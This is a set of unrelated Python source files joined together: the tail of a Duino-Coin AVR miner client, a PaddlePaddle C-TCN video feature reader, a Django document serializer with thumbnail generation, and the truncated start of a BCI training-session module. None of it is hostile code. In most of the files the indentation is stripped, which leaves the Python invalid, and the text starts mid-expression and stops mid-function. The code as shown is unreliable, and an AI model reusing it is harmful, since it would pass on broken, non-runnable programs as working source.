+ Fore.YELLOW
+ str(username)
+ '!\n')
def init_rich_presence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808056068113563701)
RPC.connect()
debug_output('Discord rich presence initialized')
except Exception:
# Discord not launched
pass
def update_rich_presence():
# Update rich presence status
startTime = int(time())
while True:
try:
RPC.update(
details='Hashrate: ' + str(round(hashrate)) + ' H/s',
start=startTime,
state='Acc. shares: '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1]),
large_image='ducol',
large_text='Duino-Coin, '
+ 'a coin that can be mined with almost everything, '
+ 'including AVR boards',
buttons=[
{'label': 'Learn more',
'url': 'https://duinocoin.com'},
{'label': 'Discord Server',
'url': 'https://discord.gg/k48Ht5y'}])
except Exception:
# Discord not launched
pass
# 15 seconds to respect Discord's rate limit
sleep(15)
def pretty_print(message_type, message, state):
# Print output messages in the DUCO 'standard'
# Usb/net/sys background
if message_type.startswith('net'):
background = Back.BLUE
elif message_type.startswith('usb'):
background = Back.MAGENTA
else:
background = Back.GREEN
# Text color
if state == 'success':
color = Fore.GREEN
elif state == 'warning':
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ background
+ ' '
+ message_type
+ ' '
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def mine_avr(com, threadid):
global hashrate
if shuffle_ports == "y":
debug_output(
'Searching for fastest connection to the server')
NODE_PORT = get_fastest_connection(str(NODE_ADDRESS))
debug_output('Fastest connection found')
else:
NODE_PORT = AVAILABLE_PORTS[0]
start_time = time()
report_shares = 0
while True:
try:
while True:
try:
# Default AVR mining port
debug_output('Connecting to ' +
str(NODE_ADDRESS + ":" + str(NODE_PORT)))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if threadid == 0:
if float(server_version) <= float(MINER_VER):
pretty_print(
'net0',
get_string('connected')
+ Style.NORMAL
+ Fore.RESET
+ get_string('connected_server')
+ str(server_version)
+ ")",
'success')
else:
pretty_print(
'sys0',
' Miner is outdated (v'
+ MINER_VER
+ ') -'
+ get_string('server_is_on_version')
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ get_string('update_warning'),
'warning')
sleep(10)
soc.send(bytes("MOTD", encoding="ascii"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
break
except Exception as e:
pretty_print(
'net0',
get_string('connecting_error')
+ Style.NORMAL
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Connection error: ' + str(e))
sleep(10)
pretty_print(
'sys'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_start')
+ Style.NORMAL
+ Fore.RESET
+ get_string('mining_algorithm')
+ str(com)
+ ')',
'success')
while True:
# Send job request
debug_output(com + ': requested job from the server')
soc.sendall(
bytes(
'JOB,'
+ str(username)
+ ',AVR',
encoding='ascii'))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(''.join(filter(str.isdigit, com)))
+ "Correct job received")
except:
pretty_print("usb"
+ str(''.join(filter(str.isdigit, com))),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
while True:
try:
ser.close()
except:
pass
try:
ser = Serial(com,
baudrate=int(BAUDRATE),
timeout=float(AVR_TIMEOUT))
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('board_connection_error')
+ str(com)
+ get_string('board_connection_error2')
+ Style.NORMAL
+ Fore.RESET
+ ' (port connection err: '
+ str(e)
+ ')',
'error')
sleep(10)
while True:
retry_counter = 0
while True:
if retry_counter >= 3:
break
try:
debug_output(com + ': sending job to AVR')
ser.write(
bytes(
str(
job[0]
+ ',' + job[1]
+ ',' + job[2]
+ ','), encoding='ascii'))
debug_output(com + ': reading result from AVR')
result = ser.read_until(b'\n').decode().strip()
ser.flush()
if "\x00" in result or not result:
raise Exception("Empty data received")
debug_output(com + ': retrieved result: '
+ str(result)
+ ' len: '
+ str(len(result)))
result = result.split(',')
try:
if result[0] and result[1]:
break
except Exception as e:
debug_output(
com
+ ': retrying reading data: '
+ str(e))
retry_counter += 1
except Exception as e:
debug_output(
com
+ ': retrying sending data: '
+ str(e))
retry_counter += 1
try:
debug_output(
com
+ ': received result ('
+ str(result[0])
+ ')')
debug_output(
com
+ ': received time ('
+ str(result[1])
+ ')')
# Convert AVR time to seconds
computetime = round(int(result[1]) / 1000000, 3)
if computetime < 1:
computetime = str(
int(computetime * 1000)) + "ms"
else:
computetime = str(round(computetime, 2)) + "s"
# Calculate hashrate
hashrate_t = round(
int(result[0]) * 1000000 / int(result[1]), 2)
hashrate_mean.append(hashrate_t)
# Get average from the last hashrate measurements
hashrate = mean(hashrate_mean[-5:])
debug_output(
com +
': calculated hashrate (' +
str(hashrate_t) + ')'
+ ' (avg:' + str(hashrate) + ')')
try:
chipID = result[2]
debug_output(
com + ': chip ID: ' + str(result[2]))
""" Check if chipID got received, this is
of course just a fraction of what's
happening on the server with it """
if not chipID.startswith('DUCOID'):
raise Exception('Wrong chipID string')
except Exception:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
' Possible incorrect chip ID!'
+ Style.NORMAL
+ Fore.RESET
+ ' This can cause problems with the'
+ ' Kolka system',
'warning')
chipID = 'None'
break
except Exception as e:
pretty_print(
'usb'
+ str(''.join(filter(str.isdigit, com))),
get_string('mining_avr_connection_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (error reading result from the board: '
+ str(e)
+ ', please check connection '
+ 'and port setting)',
'warning')
debug_output(
com + ': error splitting data: ' + str(e))
sleep(1)
try:
# Send result to the server
soc.sendall(
bytes(
str(result[0])
+ ','
+ str(hashrate_t)
+ ',Official AVR Miner (DUCO-S1A) v'
+ str(MINER_VER)
+ ','
+ str(rig_identifier)
+ ','
+ str(chipID),
encoding='ascii'))
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output(com + ': connection error: ' + str(e))
sleep(5)
break
while True:
try:
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip('\n')
responsetimestop = now()
time_delta = (responsetimestop -
responsetimetart).microseconds
ping_mean.append(round(time_delta / 1000))
ping = mean(ping_mean[-10:])
debug_output(com + ': feedback: '
+ str(feedback)
+ ' with ping: '
+ str(ping))
break
except Exception as e:
pretty_print(
'net'
+ str(''.join(filter(str.isdigit, com))),
get_string('connecting_error')
+ Style.NORMAL
+ Fore.RESET
+ ' (err parsing response: '
+ str(e)
+ ')',
'error')
debug_output(com + ': error parsing response: '
+ str(e))
sleep(5)
break
diff = get_prefix(diff)
if feedback == 'GOOD':
# If result was correct
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.GREEN
+ ' ⛏'
+ get_string('accepted')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
elif feedback == 'BLOCK':
# If block was found
shares[0] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.CYAN
+ ' ⛏'
+ get_string('block_found')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
else:
# If result was incorrect
shares[1] += 1
title(
get_string('duco_avr_miner')
+ str(MINER_VER)
+ ') - '
+ str(shares[0])
+ '/'
+ str(shares[0] + shares[1])
+ get_string('accepted_shares'))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + '%H:%M:%S ')
+ Style.BRIGHT
+ Back.MAGENTA
+ Fore.RESET
+ ' usb'
+ str(''.join(filter(str.isdigit, com)))
+ ' '
+ Back.RESET
+ Fore.RED
+ ' ✗'
+ get_string('rejected')
+ Fore.RESET
+ str(int(shares[0]))
+ '/'
+ str(int(shares[0] + shares[1]))
+ Fore.YELLOW
+ ' ('
+ str(int((shares[0]
/ (shares[0] + shares[1]) * 100)))
+ '%)'
+ Style.NORMAL
+ Fore.RESET
+ ' ∙ '
+ Fore.BLUE
+ Style.BRIGHT
+ str(round(hashrate))
+ ' H/s'
+ Style.NORMAL
+ ' ('
+ computetime
+ ')'
+ Fore.RESET
+ ' ⚙ diff '
+ str(diff)
+ ' ∙ '
+ Fore.CYAN
+ 'ping '
+ str('%02.0f' % int(ping))
+ 'ms')
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = shares[0] - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
hashrate,
uptime)
start_time = time()
break
except Exception as e:
pretty_print(
'net0',
get_string('connecting_error')
+ Style.NORMAL
+ ' (main loop err: '
+ str(e)
+ ')',
'error')
debug_output('Main loop error: ' + str(e))
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
get_string('periodic_mining_report')
+ Fore.RESET
+ Style.NORMAL
+ get_string('report_period')
+ str(seconds)
+ get_string('report_time')
+ get_string('report_body1')
+ str(shares)
+ get_string('report_body2')
+ str(round(shares/seconds, 1))
+ get_string('report_body3')
+ get_string('report_body4')
+ str(int(hashrate)) + " H/s"
+ get_string('report_body5')
+ str(int(hashrate*seconds))
+ get_string('report_body6')
+ get_string('total_mining_time')
+ str(uptime), "success")
def calculate_uptime(start_time):
    # Return a human-readable uptime; check the largest unit first so the
    # minute/hour branches are actually reachable.
    uptime = time() - start_time
    if uptime >= 7200:
        return str(round(uptime // 3600)) + get_string('uptime_hours')
    elif uptime >= 3600:
        return str(round(uptime // 3600)) + get_string('uptime_hour')
    elif uptime >= 120:
        return str(round(uptime // 60)) + get_string('uptime_minutes')
    elif uptime >= 60:
        return str(round(uptime // 60)) + get_string('uptime_minute')
    else:
        return str(round(uptime)) + get_string('uptime_seconds')
if __name__ == '__main__':
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True, convert=True)
else:
init(autoreset=True)
# Window title
title(get_string('duco_avr_miner') + str(MINER_VER) + ')')
try:
# Load config file or create new one
load_config()
debug_output('Config file loaded')
except Exception as e:
pretty_print(
'sys0',
get_string('load_config_error')
+ RESOURCES_DIR
+ get_string('load_config_error_warning')
+ Style.NORMAL
+ Fore.RESET
+ ' ('
+ str(e)
+ ')',
'error')
debug_output('Error reading configfile: ' + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
greeting()
debug_output('greeting displayed')
except Exception as e:
debug_output('Error displaying greeting message: ' + str(e))
try:
# Launch avr duco mining threads
threadid = 0
for port in avrport:
thrThread(
target=mine_avr,
args=(port, threadid)).start()
threadid += 1
except Exception as e:
debug_output('Error launching AVR thread(s): ' + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
init_rich_presence()
thrThread(
target=update_rich_presence).start()
except Exception as e:
debug_output('Error launching Discord RPC thread: ' + str(e))
|
ctcn_reader.py
|
# Copyright (c) 2019 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import random
import cv2
import sys
import numpy as np
import gc
import copy
import multiprocessing
import logging
logger = logging.getLogger(__name__)
try:
import cPickle as pickle
from cStringIO import StringIO
except ImportError:
import pickle
from io import BytesIO
from .reader_utils import DataReader
from models.ctcn.ctcn_utils import box_clamp1D, box_iou1D, BoxCoder
python_ver = sys.version_info
#random.seed(0)
#np.random.seed(0)
class CTCNReader(DataReader):
"""
    Data reader for the C-TCN model, whose input data are features extracted
    by prior networks.
    dataset cfg: img_size, the temporal dimension size of the input data
                 root, the root directory of the data
                 snippet_length, the snippet length used when sampling
                 filelist, the file list storing the id and annotations of each data item
                 rgb, the directory of the rgb data
                 flow, the directory of the optical flow data
                 batch_size, the batch size of the input data
                 num_threads, the number of data-processing threads
"""
def __init__(self, name, mode, cfg):
self.name = name
self.mode = mode
self.img_size = cfg.MODEL.img_size # 512
self.snippet_length = cfg.MODEL.snippet_length # 1
self.root = cfg.MODEL.root # root dir of data
self.filelist = cfg[mode.upper()]['filelist']
self.rgb = cfg[mode.upper()]['rgb']
self.flow = cfg[mode.upper()]['flow']
self.batch_size = cfg[mode.upper()]['batch_size']
self.num_threads = cfg[mode.upper()]['num_threads']
if (mode == 'test') or (mode == 'infer'):
self.num_threads = 1 # set num_threads as 1 for test and infer
def random_move(self, img, o_boxes, labels):
boxes = np.array(o_boxes)
mask = np.zeros(img.shape[0])
for i in boxes:
for j in range(i[0].astype('int'),
min(i[1].astype('int'), img.shape[0])):
mask[j] = 1
mask = (mask == 0)
bg = img[mask]
bg_len = bg.shape[0]
if bg_len < 5:
return img, boxes, labels
insert_place = random.sample(range(bg_len), len(boxes))
index = np.argsort(insert_place)
new_img = bg[0:insert_place[index[0]], :]
new_boxes = []
new_labels = []
for i in range(boxes.shape[0]):
new_boxes.append([
new_img.shape[0],
new_img.shape[0] + boxes[index[i]][1] - boxes[index[i]][0]
])
new_labels.append(labels[index[i]])
new_img = np.concatenate(
(new_img,
img[int(boxes[index[i]][0]):int(boxes[index[i]][1]), :]))
if i < boxes.shape[0] - 1:
new_img = np.concatenate(
(new_img,
bg[insert_place[index[i]]:insert_place[index[i + 1]], :]))
new_img = np.concatenate(
(new_img, bg[insert_place[index[len(boxes) - 1]]:, :]))
del img, boxes, mask, bg, labels
gc.collect()
return new_img, new_boxes, new_labels
def random_crop(self, img, boxes, labels, min_scale=0.3):
boxes = np.array(boxes)
labels = np.array(labels)
imh, imw = img.shape[:2]
params = [(0, imh)]
for min_iou in (0, 0.1, 0.3, 0.5, 0.7, 0.9):
for _ in range(100):
scale = random.uniform(0.3, 1)
h = int(imh * scale)
y = random.randrange(imh - h)
roi = [[y, y + h]]
ious = box_iou1D(boxes, roi)
if ious.min() >= min_iou:
params.append((y, h))
break
y, h = random.choice(params)
img = img[y:y + h, :]
center = (boxes[:, 0] + boxes[:, 1]) / 2
mask = (center[:] >= y) & (center[:] <= y + h)
if mask.any():
boxes = boxes[np.squeeze(mask.nonzero())] - np.array([[y, y]])
boxes = box_clamp1D(boxes, 0, h)
labels = labels[mask]
else:
boxes = [[0, 0]]
labels = [0]
return img, boxes, labels
def resize(self, img, boxes, size, random_interpolation=False):
'''Resize the input PIL image to given size.
If boxes is not None, resize boxes accordingly.
Args:
img: image to be resized.
boxes: (tensor) object boxes, sized [#obj,2].
size: (tuple or int)
- if is tuple, resize image to the size.
- if is int, resize the shorter side to the size while maintaining the aspect ratio.
random_interpolation: (bool) randomly choose a resize interpolation method.
Returns:
img: (cv2's numpy.ndarray) resized image.
boxes: (tensor) resized boxes.
Example:
        >>> img, boxes = resize(img, boxes, 600)  # resize shorter side to 600
'''
h, w = img.shape[:2]
if h == size:
return img, boxes
if h == 0:
img = np.zeros((512, 402), np.float32)
return img, boxes
ow = w
oh = size
sw = 1
sh = float(oh) / h
method = random.choice([
cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA
]) if random_interpolation else cv2.INTER_NEAREST
img = cv2.resize(img, (ow, oh), interpolation=method)
if boxes is not None:
boxes = boxes * np.array([sh, sh])
return img, boxes
def transform(self, feats, boxes, labels, mode):
feats = np.array(feats)
boxes = np.array(boxes)
labels = np.array(labels)
#print('name {}, labels {}'.format(fname, labels))
if mode == 'train':
feats, boxes, labels = self.random_move(feats, boxes, labels)
feats, boxes, labels = self.random_crop(feats, boxes, labels)
feats, boxes = self.resize(
feats, boxes, size=self.img_size, random_interpolation=True)
h, w = feats.shape[:2]
img = feats.reshape(1, h, w)
Coder = BoxCoder()
boxes, labels = Coder.encode(boxes, labels)
if mode == 'test' or mode == 'valid':
feats, boxes = self.resize(feats, boxes, size=self.img_size)
h, w = feats.shape[:2]
img = feats.reshape(1, h, w)
Coder = BoxCoder()
boxes, labels = Coder.encode(boxes, labels)
return img, boxes, labels
def create_reader(self):
"""reader creator for ctcn model"""
if self.num_threads == 1:
return self.make_reader()
else:
return self.make_multiprocess_reader()
def make_reader(self):
"""single process reader"""
def reader():
with open(self.filelist) as f:
reader_list = f.readlines()
if self.mode == 'train':
random.shuffle(reader_list)
fnames = []
total_boxes = []
total_labels = []
total_label_ids = []
for i in range(len(reader_list)):
line = reader_list[i]
splited = line.strip().split()
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, splited[0] + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, splited[0] + '.pkl'))
if not (rgb_exist and flow_exist):
print('file not exist', splited[0])
continue
fnames.append(splited[0])
frames_num = int(splited[1]) // self.snippet_length
num_boxes = int(splited[2])
box = []
label = []
for i in range(num_boxes):
c = splited[3 + 3 * i]
xmin = splited[4 + 3 * i]
xmax = splited[5 + 3 * i]
box.append([
float(xmin) / self.snippet_length,
float(xmax) / self.snippet_length
])
label.append(int(c))
total_label_ids.append(i)
total_boxes.append(box)
total_labels.append(label)
num_videos = len(fnames)
batch_out = []
for idx in range(num_videos):
fname = fnames[idx]
try:
if python_ver < (3, 0):
rgb_pkl = pickle.load(
open(
os.path.join(self.root, self.rgb, fname +
'.pkl')))
flow_pkl = pickle.load(
open(
os.path.join(self.root, self.flow, fname +
'.pkl')))
else:
rgb_pkl = pickle.load(
open(
os.path.join(self.root, self.rgb, fname +
'.pkl')),
encoding='bytes')
flow_pkl = pickle.load(
open(
os.path.join(self.root, self.flow, fname +
'.pkl')),
encoding='bytes')
data_flow = np.array(flow_pkl['scores'])
data_rgb = np.array(rgb_pkl['scores'])
if data_flow.shape[0] < data_rgb.shape[0]:
data_rgb = data_rgb[0:data_flow.shape[0], :]
elif data_flow.shape[0] > data_rgb.shape[0]:
data_flow = data_flow[0:data_rgb.shape[0], :]
feats = np.concatenate((data_rgb, data_flow), axis=1)
if feats.shape[0] == 0 or feats.shape[1] == 0:
feats = np.zeros((512, 1024), np.float32)
logger.info('### file loading len = 0 {} ###'.format(
fname))
boxes = copy.deepcopy(total_boxes[idx])
labels = copy.deepcopy(total_labels[idx])
feats, boxes, labels = self.transform(feats, boxes, labels,
self.mode)
labels = labels.astype('int64')
boxes = boxes.astype('float32')
num_pos = len(np.where(labels > 0)[0])
                except Exception:
logger.info('Error when loading {}'.format(fname))
continue
if (num_pos < 1) and (self.mode == 'train' or
self.mode == 'valid'):
#logger.info('=== no pos for ==='.format(fname, num_pos))
continue
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((feats, boxes, labels))
elif self.mode == 'test':
batch_out.append(
(feats, boxes, labels, total_label_ids[idx]))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
yield batch_out
batch_out = []
return reader
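    # A minimal usage sketch (assuming a parsed `cfg` object like the one
    # consumed in __init__; names are illustrative):
    #
    #   >>> reader = CTCNReader('CTCN', 'train', cfg).create_reader()
    #   >>> for batch in reader():
    #   ...     feats, boxes, labels = batch[0]  # first sample of the batch
    #
    # Each yielded batch is a list of `batch_size` tuples as assembled above.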
def make_multiprocess_reader(self):
"""multiprocess reader"""
def read_into_queue(reader_list, queue):
fnames = []
total_boxes = []
total_labels = []
total_label_ids = []
#for line in reader_list:
for i in range(len(reader_list)):
line = reader_list[i]
splited = line.strip().split()
rgb_exist = os.path.exists(
os.path.join(self.root, self.rgb, splited[0] + '.pkl'))
flow_exist = os.path.exists(
os.path.join(self.root, self.flow, splited[0] + '.pkl'))
if not (rgb_exist and flow_exist):
logger.info('file not exist {}'.format(splited[0]))
continue
fnames.append(splited[0])
frames_num = int(splited[1]) // self.snippet_length
num_boxes = int(splited[2])
box = []
label = []
for i in range(num_boxes):
c = splited[3 + 3 * i]
xmin = splited[4 + 3 * i]
xmax = splited[5 + 3 * i]
box.append([
float(xmin) / self.snippet_length,
float(xmax) / self.snippet_length
])
label.append(int(c))
total_label_ids.append(i)
total_boxes.append(box)
total_labels.append(label)
num_videos = len(fnames)
batch_out = []
for idx in range(num_videos):
fname = fnames[idx]
try:
if python_ver < (3, 0):
rgb_pkl = pickle.load(
open(
os.path.join(self.root, self.rgb, fname +
'.pkl')))
flow_pkl = pickle.load(
open(
os.path.join(self.root, self.flow, fname +
'.pkl')))
else:
rgb_pkl = pickle.load(
open(
os.path.join(self.root, self.rgb, fname +
'.pkl')),
encoding='bytes')
flow_pkl = pickle.load(
open(
os.path.join(self.root, self.flow, fname +
'.pkl')),
encoding='bytes')
data_flow = np.array(flow_pkl['scores'])
data_rgb = np.array(rgb_pkl['scores'])
if data_flow.shape[0] < data_rgb.shape[0]:
data_rgb = data_rgb[0:data_flow.shape[0], :]
elif data_flow.shape[0] > data_rgb.shape[0]:
data_flow = data_flow[0:data_rgb.shape[0], :]
feats = np.concatenate((data_rgb, data_flow), axis=1)
if feats.shape[0] == 0 or feats.shape[1] == 0:
feats = np.zeros((512, 1024), np.float32)
logger.info('### file loading len = 0 {} ###'.format(
fname))
boxes = copy.deepcopy(total_boxes[idx])
labels = copy.deepcopy(total_labels[idx])
feats, boxes, labels = self.transform(feats, boxes, labels,
self.mode)
labels = labels.astype('int64')
boxes = boxes.astype('float32')
num_pos = len(np.where(labels > 0)[0])
                except Exception:
logger.info('Error when loading {}'.format(fname))
continue
                if (num_pos < 1) and (self.mode == 'train' or
                                      self.mode == 'valid'):
#logger.info('=== no pos for {}, num_pos = {} ==='.format(fname, num_pos))
continue
if self.mode == 'train' or self.mode == 'valid':
batch_out.append((feats, boxes, labels))
elif self.mode == 'test':
batch_out.append(
(feats, boxes, labels, total_label_ids[idx]))
else:
raise NotImplementedError('mode {} not implemented'.format(
self.mode))
if len(batch_out) == self.batch_size:
queue.put(batch_out)
batch_out = []
queue.put(None)
def queue_reader():
with open(self.filelist) as f:
fl = f.readlines()
if self.mode == 'train':
random.shuffle(fl)
n = self.num_threads
queue_size = 20
reader_lists = [None] * n
file_num = int(len(fl) // n)
for i in range(n):
if i < len(reader_lists) - 1:
tmp_list = fl[i * file_num:(i + 1) * file_num]
else:
tmp_list = fl[i * file_num:]
reader_lists[i] = tmp_list
queue = multiprocessing.Queue(queue_size)
p_list = [None] * len(reader_lists)
# for reader_list in reader_lists:
for i in range(len(reader_lists)):
reader_list = reader_lists[i]
p_list[i] = multiprocessing.Process(
target=read_into_queue, args=(reader_list, queue))
p_list[i].start()
reader_num = len(reader_lists)
finish_num = 0
while finish_num < reader_num:
sample = queue.get()
if sample is None:
finish_num += 1
else:
yield sample
for i in range(len(p_list)):
if p_list[i].is_alive():
p_list[i].join()
return queue_reader
|
serializers.py
|
from datetime import datetime
import tempfile
import logging
import os
import threading
from django.core.files.uploadedfile import SimpleUploadedFile
from wand.image import Image
from rest_framework import serializers
from .models import Directory, Document
logger = logging.getLogger(__name__)
THUMBNAIL_CREATE_TIMEOUT = 30  # seconds
MAX_PDF_SIZE_FOR_THUMBNAIL = 200 * 1024 * 1024 # Bytes
class DirectorySerializer(serializers.ModelSerializer):
class Meta:
model = Directory
fields = ('id', 'url', 'name')
class DocumentSerializer(serializers.ModelSerializer):
directory_set = DirectorySerializer(many=True, read_only=True)
class Meta:
model = Document
fields = ('id', 'name', 'description', 'type', 'file', 'thumbnail', 'directory_set')
@staticmethod
def fill_document_type(validated_data):
content_type = validated_data['file'].content_type
if content_type.startswith('image/'):
validated_data['type'] = Document.TYPE_IMAGE
elif content_type == 'application/pdf':
validated_data['type'] = Document.TYPE_PDF
elif content_type.startswith('video/'):
validated_data['type'] = Document.TYPE_VIDEO
elif content_type.startswith('audio/'):
validated_data['type'] = Document.TYPE_AUDIO
elif content_type == 'application/vnd.android.package-archive':
validated_data['type'] = Document.TYPE_GOOGLE_APK
else:
validated_data['type'] = Document.TYPE_OTHERS
@staticmethod
def create_pdf_thumbnail(validated_data):
file_name = None
# use page[0] as thumbnail
with Image(filename=validated_data['file'].temporary_file_path() + '[0]') as img:
file_name = tempfile.mktemp(suffix='.png')
img.save(filename=file_name) # save to /tmp
        if file_name is not None:
            # file_name is already an absolute path in the temp directory
            with open(file_name, 'rb') as f:
                validated_data['thumbnail'] = SimpleUploadedFile(file_name, f.read())
def create(self, validated_data):
logger.debug('creating document ...')
self.fill_document_type(validated_data)
start = datetime.now()
if 'thumbnail' in validated_data:
return super().create(validated_data)
# generate thumbnail here
uploaded_file = validated_data['file']
content_type = uploaded_file.content_type
if content_type in ['image/jpeg', 'image/png']:
# copy the image for thumbnail
with open(uploaded_file.temporary_file_path(), 'rb') as f:
validated_data['thumbnail'] = SimpleUploadedFile(uploaded_file.name, f.read())
elif content_type in ['application/pdf']:
if uploaded_file.size < MAX_PDF_SIZE_FOR_THUMBNAIL:
t = threading.Thread(name='create-pdf-thumbnail',
target=self.create_pdf_thumbnail, args=(validated_data,))
t.start()
t.join(timeout=THUMBNAIL_CREATE_TIMEOUT)
if 'thumbnail' not in validated_data:
                    logger.warning('thumbnail is not generated for "%s" because of timeout.' % validated_data['name'])
else:
                logger.warning('the pdf file "%s" is too large (>%d Bytes) to generate thumbnail.'
                               % (validated_data['name'], MAX_PDF_SIZE_FOR_THUMBNAIL))
logger.debug('%d secs elapsed for modifying the validated data.' % (datetime.now() - start).seconds)
return super().create(validated_data)
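# A minimal usage sketch (hypothetical view wiring, not part of this module):
#
#   >>> from rest_framework import viewsets
#   >>> class DocumentViewSet(viewsets.ModelViewSet):
#   ...     queryset = Document.objects.all()
#   ...     serializer_class = DocumentSerializer
#
# On create, DocumentSerializer derives `type` from the uploaded file's
# content type and generates a thumbnail for images and sufficiently small
# PDFs, as implemented above.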
|
sessions.py
|
import time
import threading
import traceback
from joblib import load
from . import logger
from .dataCollector import DataStack
from .BCIDecoder import BCIDecoder
class TrainSession(object):
    ''' The train session.
    1. Automatically collects data;
    2. Trains the decoder when stopped;
    3. Saves the data when stopped.
    '''
def __init__(self, filepath):
''' Initialize the train module,
Args:
            - @filepath: The path where the collected data will be stored;
'''
# Necessary parameters
self.filepath = filepath
# Start collecting data
self.ds = DataStack(filepath)
self.ds.start()
self.stopped = False
def receive(self, dct):
logger.debug(f'Training module received {dct}')
method = dct.get('method', None)
if method == 'stopSession':
# Stop training session,
# 1. Stop collecting data;
# 2. Generate decoder and save it to the disk;
# 3. Save the data to the disk
self.stopped = True
self.ds.stop()
self.ds.save()
self.ds.close()
logger.debug(f'Training module stopped')
return 0, dict(
method='sessionStopped',
sessionName='training',
)
return 1, dict(
method='error',
reason='invalidMessage',
raw='',
comment=f'Training module failed to parse {dct}'
)
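    # A minimal sketch of the message protocol handled by receive() above
    # (the file path is illustrative):
    #
    #   >>> session = TrainSession('/tmp/train-session.dump')
    #   >>> session.receive({'method': 'stopSession'})
    #   (0, {'method': 'sessionStopped', 'sessionName': 'training'})
    #
    # Any other message results in the (1, {'method': 'error', ...}) reply.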
class BuildSession(object):
    ''' The session for building the BCIDecoder.
    1. Only responds to the startBuilding task;
    2. Two modules are selected:
        - the youbiaoqian module;
        - the wubiaoqian module;
    '''
def __init__(self, filepath, decoderpath, sessionname):
''' Initialize the train module,
Args:
- @filepath: The path of the file to be stored;
- @decoderpath: The path of the decoder to be stored;
- @sessionname: The name of the session, 'youbiaoqian' or 'wubiaoqian'.
'''
# Necessary parameters
self.filepath = filepath
self.decoderpath = decoderpath
self.generate_decoder()
def generate_decoder(self):
# Generate and save decoder
